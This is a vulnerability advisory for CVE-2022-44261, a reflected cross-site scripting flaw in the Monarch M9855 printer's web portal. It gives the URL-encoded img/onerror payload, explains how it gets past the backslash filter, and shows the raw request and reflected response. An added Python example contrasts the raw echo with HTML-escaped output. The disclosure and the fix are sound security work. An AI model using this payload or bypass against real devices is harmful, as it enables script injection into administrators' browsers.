Reflected XSS (Cross-Site Scripting) attack - CVE-2022-44261
------------------------------------------------------------
Vendor: Avery Dennison
Print Model: Monarch M9855
Software Version: Monarch 7411 Print Adapter, Firmware Ver. CAMO-7.68 (2011.06.02), Boot Ver. 7.3
Type: Unauthenticated Remote attack
We have identified that the web portal of the "Monarch M9855" printer is vulnerable to Reflected Cross-Site Scripting (XSS). This is because the web application fails to adequately sanitize malicious strings. By leveraging this issue, an attacker is able to cause arbitrary HTML and JavaScript code to be executed in a user's browser within the security context of the affected site. This attack can be used in conjunction with social engineering techniques.
We have managed to bypass the server-side protection, given that the back-end does not allow the "\" character. Also, the space character should be URL-encoded. Therefore, we crafted a URL-encoded payload that does not contain the "\" character.
Below, evidence is provided.
Request:
GET /%3Cimg%20src%3Dx%20onerror%3Dalert%28%22XSSbyIthacaLabs%22%29%3E HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Response:
HTTP/1.0 200 Document follows
Server: XCD WebAdmin
Content-Type: text/html
<html><head><title> ERROR 404</title></head><body><center> FILE /<img src=x onerror=alert("XSSbyIthacaLabs")> NOT FOUND, ERROR 404</center></body></html>
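Added example (not part of the original advisory and not the vendor's code): a Python model of the 404 page that rebuilds the response above from the request line, next to a version that HTML-encodes the path before echoing it. The function names and the way the "\" check is handled are assumptions; the firmware's own code is not shown in the advisory.

```python
import html
from urllib.parse import unquote

# Request line copied from the advisory's evidence.
REQUEST_LINE = ("GET /%3Cimg%20src%3Dx%20onerror%3Dalert%28%22XSSbyIthacaLabs"
                "%22%29%3E HTTP/1.1")

# Error page layout copied from the advisory's response body.
TEMPLATE = ("<html><head><title> ERROR 404</title></head><body><center> "
            "FILE {path} NOT FOUND, ERROR 404</center></body></html>")


def request_path(request_line: str) -> str:
    """Return the percent-decoded path from an HTTP request line."""
    _method, target, _version = request_line.split(" ", 2)
    return unquote(target.split("?", 1)[0])


def render_404_blocklist(path: str) -> str:
    """Modelled 'before': reject one character, then echo the path raw."""
    if "\\" in path:
        path = ""  # assumed handling; the advisory only says "\" is not allowed
    return TEMPLATE.format(path=path)


def render_404_escaped(path: str) -> str:
    """Hardened: encode the path for an HTML text context before echoing it."""
    return TEMPLATE.format(path=html.escape(path, quote=True))


if __name__ == "__main__":
    decoded = request_path(REQUEST_LINE)
    print("blocklist only:", render_404_blocklist(decoded))
    print("output encoded:", render_404_escaped(decoded))
```

A single-character blocklist leaves "<", ">" and quotes untouched, so the decoded path reaches the page as markup; encoding at output makes the same path render as inert text.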